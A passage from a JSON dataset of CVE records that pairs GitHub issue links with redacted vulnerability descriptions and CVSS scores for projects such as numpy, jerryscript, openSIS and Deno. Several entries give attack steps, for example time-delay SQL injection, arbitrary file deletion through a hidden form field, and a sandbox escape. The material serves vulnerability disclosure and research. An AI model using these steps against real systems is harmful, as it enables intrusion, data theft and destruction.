        "description": "APITAG XSS in PATHTAG Describe the bug/issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. Note that these multiple XSS vulnerabilities exist in the APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to the following link: URLTAG NUMBERTAG Boom! Where the vulnerability occurred? The code below displays the user controlled parameter challenge in PATHTAG with incorrect sanitization: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41490",
        "Issue_Url_old": "https://github.com/ompl/ompl/issues/833",
        "Issue_Url_new": "https://github.com/ompl/ompl/issues/833",
        "Repo_new": "ompl/ompl",
        "Issue_Created_At": "2021-09-18T06:09:08Z",
        "description": "Memory leaks in APITAG Here are some outputs NUMBERTAG f5dbf NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG f5dbe NUMBERTAG b NUMBERTAG in APITAG const PATHTAG NUMBERTAG f5dbe3d NUMBERTAG in APITAG const ) const PATHTAG NUMBERTAG f5dbe NUMBERTAG in APITAG const ) const PATHTAG NUMBERTAG f5dbe NUMBERTAG in APITAG const&) PATHTAG After our analysis, this crash comes from APITAG In line PATHTAG of APITAG they can apply for memory space. At the same time, the APITAG function can release the memory. However, during our testing, the program will still run to APITAG PATHTAG (application meomory space) after the last call of APITAG so the memory space is not completely released and causing memory leaks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41495",
        "Issue_Url_old": "https://github.com/numpy/numpy/issues/19038",
        "Issue_Url_new": "https://github.com/numpy/numpy/issues/19038",
        "Repo_new": "numpy/numpy",
        "Issue_Created_At": "2021-05-19T06:21:52Z",
        "description": "Missing return value validation of the function APITAG APITAG Reproducing code example: The definition of APITAG CODETAG Call site example for APITAG CODETAG Error message: At most call sites for APITAG there are no validations of its return, but an invalid address may be returned. FILETAG APITAG version information: the main branch",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2021-41496",
        "Issue_Url_old": "https://github.com/numpy/numpy/issues/19000",
        "Issue_Url_new": "https://github.com/numpy/numpy/issues/19000",
        "Repo_new": "numpy/numpy",
        "Issue_Created_At": "2021-05-13T04:05:51Z",
        "description": "Potential buffer overflow from string operations in function array_from_pyobj of fortranobject.c. APITAG Reproducing code example: Snippet : ERRORTAG Error message: File : PATHTAG Function : array_from_pyobj (line NUMBERTAG Optional call path : External > fortran_setattr > array_from_pyobj Details in FILETAG When we run our analysis tool on APITAG a few Inappropriate string operations are reported at call sites of function strcpy, sprintf, and strcat in array_from_pyobj. There are no boundary checks at these points despite \"mess\" seems large enough to ensure the operations safe except for the point shown above. As a suggestion, it is better to replace these functions with strncpy, strncat, and snprintf. APITAG version information: the main branch of APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41497",
        "Issue_Url_old": "https://github.com/RaRe-Technologies/bounter/issues/47",
        "Issue_Url_new": "https://github.com/rare-technologies/bounter/issues/47",
        "Repo_new": "rare-technologies/bounter",
        "Issue_Created_At": "2021-05-14T08:12:08Z",
        "description": "Potential buffer overflow in APITAG of hill.c. APITAG APITAG Description Write to \"self >registers FILETAG PATHTAG to Reproduce ERRORTAG Optional call path : increment > APITAG > APITAG > APITAG Expected Results Return after APITAG Actual Results No return Versions the main branch APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41498",
        "Issue_Url_old": "https://github.com/belangeo/pyo/issues/221",
        "Issue_Url_new": "https://github.com/belangeo/pyo/issues/221",
        "Repo_new": "belangeo/pyo",
        "Issue_Created_At": "2021-05-27T06:00:51Z",
        "description": "Missing a terminator after strncpy in function Server_jack_init, which may cause read overflow. Code snippet CODETAG Description Function : Server_jack_init File : ad_jack.c Call path : boot APITAG > Server_boot > Server_jack_init APITAG : read overflow. Our analysis tool reported a warning at the call site of strncpy. As client_name is not initialized, it may has no terminator after strncpy hence to cases read overflow. Also seen in FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41499",
        "Issue_Url_old": "https://github.com/belangeo/pyo/issues/222",
        "Issue_Url_new": "https://github.com/belangeo/pyo/issues/222",
        "Repo_new": "belangeo/pyo",
        "Issue_Created_At": "2021-05-27T06:14:03Z",
        "description": "Insecure function vsprintf may cause write overflow in function Server_debug. Code snippet ERRORTAG Description Function : Server_debug File : servermodule.c Call path : recstart APITAG > Server_start_rec > Server_start_rec_internal > Server_debug APITAG : Write overflow. Our analysis tool reported a warning at vsprintf in Server_debug. As buffer is a fixed size stack variable, when the debug mode is open, vsprintf may cause write overflow with no boundary check especially when the inputs depended on external modules (e.g., Python). Also seen in FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41500",
        "Issue_Url_old": "https://github.com/cvxopt/cvxopt/issues/193",
        "Issue_Url_new": "https://github.com/cvxopt/cvxopt/issues/193",
        "Repo_new": "cvxopt/cvxopt",
        "Issue_Created_At": "2021-05-27T07:26:26Z",
        "description": "Incomplete comparison with function strncmp. Code snippet CODETAG Description Function : PATHTAG Call path NUMBERTAG solve APITAG > solve > strncmp NUMBERTAG spsolve APITAG > spsolve > strncmp NUMBERTAG APITAG > diag > strncmp NUMBERTAG APITAG > getfactor > strncmp APITAG : Incomplete comparison. Out analysis tool reported four warnings about the incomplete comparison of strings as shown above. When the comparison length is NUMBERTAG the terminator would be ignored. Hence even the strncmp returns NUMBERTAG the reality may not match expectations specifically when variable descr depends on external inputs APITAG For example, descr = \"CHOLMOD APITAG the comparison still return NUMBERTAG Also seen in FILETAG , FILETAG , FILETAG and FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41502",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/885",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/885",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2021-09-19T07:45:36Z",
        "description": "FILETAG no: FILETAG detailed steps: After publishing a blog with uploaded pictures, click APITAG Blog Entry\" to enter the modification page, open Burp Suit and then directly click \"save\", modify the content of image FILETAG Any member browses the blog page: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-4156",
        "Issue_Url_old": "https://github.com/libsndfile/libsndfile/issues/731",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/731",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2021-04-13T15:59:19Z",
        "description": "Heap buffer overflow in APITAG in flac_buffer_copy. Hi, I found a vulnerability in current master NUMBERTAG bd NUMBERTAG b URLTAG . There is a heap buffer overflow in APITAG in flac_buffer_copy. The vulnerability can lead to heap based buffer overflow via a crafted sound file, and potentially control heap data by forge buffer content to perform heap exploitation. To reproduce on NUMBERTAG Ubuntu NUMBERTAG with clang NUMBERTAG CODETAG APITAG FILETAG ASAN report: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41581",
        "Issue_Url_old": "https://github.com/libressl-portable/openbsd/issues/126",
        "Issue_Url_new": "https://github.com/libressl/openbsd/issues/126",
        "Repo_new": "libressl/openbsd",
        "Issue_Created_At": "2021-09-23T14:25:43Z",
        "description": "stack buffer overflow in function APITAG The following program can make APITAG : ERRORTAG Here is the asan report: ERRORTAG This is because the buffer working is full of data thus is not ended with APITAG , and the call of strdup can crash the program. In the function APITAG of APITAG , the variable wi means the bytes have been written in buffer work \uff0cif wi is greater than or equal to APITAG , the parse should be stopped because the last byte should be APITAG . The following patch can fix this problem: CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41641",
        "Issue_Url_old": "https://github.com/denoland/deno/issues/12152",
        "Issue_Url_new": "https://github.com/denoland/deno/issues/12152",
        "Repo_new": "denoland/deno",
        "Issue_Created_At": "2021-09-20T12:46:38Z",
        "description": "APITAG Deno Sandbox Escape. The Deno file sandbox does not handle symbolic links correctly. When running Deno with specific write access the APITAG method can be used to gain access to any directory. Proof of concept: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.4,
        "impactScore": 5.8,
        "exploitabilityScore": 2.0
    },
    {
        "CVE_ID": "CVE-2021-41652",
        "Issue_Url_old": "https://github.com/sruupl/batflat/issues/113",
        "Issue_Url_new": "https://github.com/sruupl/batflat/issues/113",
        "Repo_new": "sruupl/batflat",
        "Issue_Created_At": "2021-09-20T16:54:46Z",
        "description": "Insecure permissions for APITAG The whole database can be easily dumped with a single http request URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41663",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/41",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/41",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2021-09-21T10:09:19Z",
        "description": "An xss vulnerability was found where my article was posted. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41672",
        "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/5",
        "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/5",
        "Repo_new": "advisto/peel-shopping",
        "Issue_Created_At": "2022-06-12T17:25:24Z",
        "description": "SQL Injection in APITAG id_utilisateur POST parameter APITAG Product Version NUMBERTAG Author : Frentzen CVE Assigned : CVETAG Vulnerability Description : Authenticated user (with some administrator pivileges) can inject malicious query in order to achive SQL injection via \"id_utilisateur\" POST parameter on the PATHTAG endpoint. After this attack, attacker can read sensitive information from the database and until modify its data. Vulnerable URL: FILETAG Proof of Concept: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-41677",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/202",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/202",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-22T07:15:59Z",
        "description": "SQL injection in function FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG Grade= parameter FILETAG POC FILETAG REQUEST CODETAG RESPONSE ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41678",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/203",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/203",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-22T08:17:21Z",
        "description": "SQL injection in function FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG staff FILETAG FILETAG POC FILETAG REQUEST ERRORTAG RESPONSE ERRORTAG SOLUTION Use function APITAG before assign $_REQUEST['staff'] to $value param. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41679",
        "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/204",
        "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/204",
        "Repo_new": "os4ed/opensis-classic",
        "Issue_Created_At": "2021-09-22T08:56:02Z",
        "description": "SQL INJECTION IN FUNCTION FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG period parameter. FILETAG POC: FILETAG REQUEST: GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: close Referer: URLTAG Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG RESPONSE: HTTP NUMBERTAG OK Date: Wed NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate Pragma: no cache Vary: Accept Encoding Content Length NUMBERTAG Connection: close Content Type: text/html; charset=UTF NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41682",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4747",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4747",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-08-24T03:35:55Z",
        "description": "heap use after free in APITAG APITAG revision NUMBERTAG bcd NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41683",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4745",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4745",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-08-24T03:27:50Z",
        "description": "stack overflow in ecma_get_lex_env_type. APITAG revision APITAG Build platform APITAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41715",
        "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/27",
        "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/27",
        "Repo_new": "libsixel/libsixel",
        "Issue_Created_At": "2021-09-14T12:27:12Z",
        "description": "heap use after free in PATHTAG Hi,I found a heap use after free in the current master fb NUMBERTAG URLTAG It sames with the PATHTAG NUMBERTAG URLTAG (I just found the problem.) OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG It's the command line's report: ERRORTAG and here is the ASAN report for saitoha/libsixel (the current master NUMBERTAG a5be8b URLTAG : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41729",
        "Issue_Url_old": "https://github.com/meiko-S/BaiCloud-cms/issues/3",
        "Issue_Url_new": "https://github.com/meiko-s/baicloud/issues/3",
        "Repo_new": "meiko-s/baicloud",
        "Issue_Created_At": "2021-09-22T04:36:17Z",
        "description": "Bug Report: Multiple Arbitrary File Deletion vulnerabilities. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG August NUMBERTAG Product version NUMBERTAG Download link Author: hibiki sama Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG kanacms\\user FILETAG It can be found that there is no verification, just judge whether it is the same as the previous or default, and then use unlink to delete the file as long as the file exists Therefore, the vulnerability analysis and utilization are very simple FILETAG We deleted the installed lock file / install / APITAG FILETAG Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG There is an arbitrary file deletion vulnerability. I have to say that the system is really problematic in judging this The file causing the problem is in / user / FILETAG It is also a problem caused by the comparison between oldimg and img FILETAG Similar to the above analysis, it only judges whether it is the same as the original, and then splices.. / and directly calls unlink, so the use is also very simple Just delete the hidden of the form attribute in HTML, and then directly enter the file name you want to delete",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41732",
        "Issue_Url_old": "https://github.com/zeek/zeek/issues/1798",
        "Issue_Url_new": "https://github.com/zeek/zeek/issues/1798",
        "Repo_new": "zeek/zeek",
        "Issue_Created_At": "2021-09-24T12:58:26Z",
        "description": "There is a http request splitting vulnerability. By sending a specific HTTP POST request, ZEEK will split a request into multiple and split the wrong fields. This will invalidate any ZEEK HTTP based security APITAG ZEEK's internal security plug ins). POC APITAG Detailed information ZEEK version APITAG start ZEEK CODETAG Send normal request ERRORTAG ZEEK generates NUMBERTAG log The request method is POST, the host is APITAG and the uri is / FILETAG ERRORTAG send poc ERRORTAG ZEEK generates HTTP logs with NUMBERTAG errors The first display request method is POST, host is uri is / FILETAG The second display request method is bc, host is uri is abc The third display request method is POST, the host is APITAG and the uri is / FILETAG Obviously, ZEEK divides an HTTP request into three, and the request method, request host and request URI are misplaced. This will invalidate any ZEEK HTTP based analysis. HTTP request splitting vulnerability exists. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41736",
        "Issue_Url_old": "https://github.com/grame-cncm/faust/issues/653",
        "Issue_Url_new": "https://github.com/grame-cncm/faust/issues/653",
        "Repo_new": "grame-cncm/faust",
        "Issue_Created_At": "2021-09-24T09:33:04Z",
        "description": "Memory corruptions in Faust compiler. I went on with some tests (similarly to NUMBERTAG and I discovered overall NUMBERTAG different vulnerabilities. You can reproduce by compiling with asan enabled. Here I attach a resume of the stacktrace and the crashing inputs. If it is possible, I would like to request for at least some CVEs that I need for a paper. FILETAG Error type : ABRT on unknown address NUMBERTAG e NUMBERTAG fdc (pc NUMBERTAG fe0e NUMBERTAG a9fb7 bp NUMBERTAG dc NUMBERTAG sp NUMBERTAG fe0e0e NUMBERTAG T2) Error location NUMBERTAG ba NUMBERTAG in APITAG , APITAG > >::vector(unsigned long, APITAG > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ba NUMBERTAG a bp NUMBERTAG fff NUMBERTAG d NUMBERTAG sp NUMBERTAG fff NUMBERTAG d NUMBERTAG a0 T0) Error location NUMBERTAG ba NUMBERTAG a in ppsig::printui(std::ostream&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG ) const ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG aec NUMBERTAG bp NUMBERTAG ffc NUMBERTAG b0 sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG T0) Error location NUMBERTAG aec NUMBERTAG in APITAG , APITAG > > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : ABRT on unknown address NUMBERTAG e NUMBERTAG fe8 (pc NUMBERTAG fc NUMBERTAG ecfb7 bp NUMBERTAG dc NUMBERTAG sp NUMBERTAG fc NUMBERTAG aa NUMBERTAG T2) Error location NUMBERTAG b NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : stack overflow on address NUMBERTAG ffec7cfdf NUMBERTAG pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffec7cfe7b0 sp NUMBERTAG ffec7cfdf NUMBERTAG T0) Error location NUMBERTAG d NUMBERTAG in __interceptor_strcmp ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : heap buffer overflow on address NUMBERTAG cb8 at pc NUMBERTAG b9f8f9 bp NUMBERTAG fe NUMBERTAG fac NUMBERTAG sp NUMBERTAG fe NUMBERTAG fac NUMBERTAG Error location NUMBERTAG b9f8f8 in APITAG , APITAG , APITAG , APITAG , APITAG > > const&) propagate.cpp Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG a bp NUMBERTAG fff5c0e NUMBERTAG d0 sp NUMBERTAG fff5c0e3cc0 T0) Error location NUMBERTAG f NUMBERTAG a in APITAG , APITAG ) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ed6b6 bp NUMBERTAG ffd6c0d NUMBERTAG e0 sp NUMBERTAG ffd6c0d NUMBERTAG e0 T0) Error location NUMBERTAG ed6b6 in APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ba NUMBERTAG bp NUMBERTAG fffc NUMBERTAG a9d0 sp NUMBERTAG fffc NUMBERTAG a8e0 T0) Error location NUMBERTAG ba NUMBERTAG in ppsig::printui(std::ostream&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG ) const ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41746",
        "Issue_Url_old": "https://github.com/purple-WL/Yonyou-TurboCRM-SQL-injection/issues/1",
        "Issue_Url_new": "https://github.com/purple-wl/yonyou-turbocrm-sql-injection/issues/1",
        "Repo_new": "purple-wl/yonyou-turbocrm-sql-injection",
        "Issue_Created_At": "2021-09-26T09:31:04Z",
        "description": "SQL injection. Yonyou APITAG is a customer relationship management system. Yonyou APITAG has SQL injection vulnerabilities. Attackers can use the vulnerabilities to obtain sensitive database information. Visit FILETAG and click OK FILETAG Capture the packet and enter the SQL statement WAITFOR DELAY NUMBERTAG in the orgcode parameter There is a delay and an error is reported: FILETAG Use APITAG to scan for injection points FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41752",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4779",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4779",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-09-23T13:13:53Z",
        "description": "stack overflow in APITAG APITAG revision e1ce7dd7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Linu NUMBERTAG generic NUMBERTAG with glibc NUMBERTAG Build steps PATHTAG clean debug compile flag= fsanitize=address \\ compile flag= m NUMBERTAG compile flag= fno omit frame pointer \\ compile flag= fno common compile flag= g strip=off \\ system allocator=on logging=on linker flag= fuse ld=gold \\ error messages=on lto=off stack limit NUMBERTAG Test case ERRORTAG Execution platform the same as the build platform. Output ERRORTAG Backtrace see above",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41821",
        "Issue_Url_old": "https://github.com/wazuh/wazuh/issues/9201",
        "Issue_Url_new": "https://github.com/wazuh/wazuh/issues/9201",
        "Repo_new": "wazuh/wazuh",
        "Issue_Created_At": "2021-07-05T16:36:54Z",
        "description": "Potential integer underflow in remote code. APITAG APITAG APITAG APITAG | | | | | | | Latest | Remoted| APITAG | APITAG | OS version | Hello team, After checking the remote code, we observed something that should be reviewed because it could incur an integer underflow. Specifically here: URLTAG After defining the size, and depending on the input value, the following can have a lower value: URLTAG For instance, with a buffer of APITAG Regards, Miguel Casares",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41826",
        "Issue_Url_old": "https://github.com/PlaceOS/auth/issues/36",
        "Issue_Url_new": "https://github.com/placeos/auth/issues/36",
        "Repo_new": "placeos/auth",
        "Issue_Created_At": "2021-09-28T15:52:23Z",
        "description": "CVETAG : URL Redirection to Untrusted Site APITAG Redirect'). The application accepts a user controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. CODETAG FILETAG Payload: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41862",
        "Issue_Url_old": "https://github.com/killme2008/aviatorscript/issues/421",
        "Issue_Url_new": "https://github.com/killme2008/aviatorscript/issues/421",
        "Repo_new": "killme2008/aviatorscript",
        "Issue_Created_At": "2021-09-30T09:20:15Z",
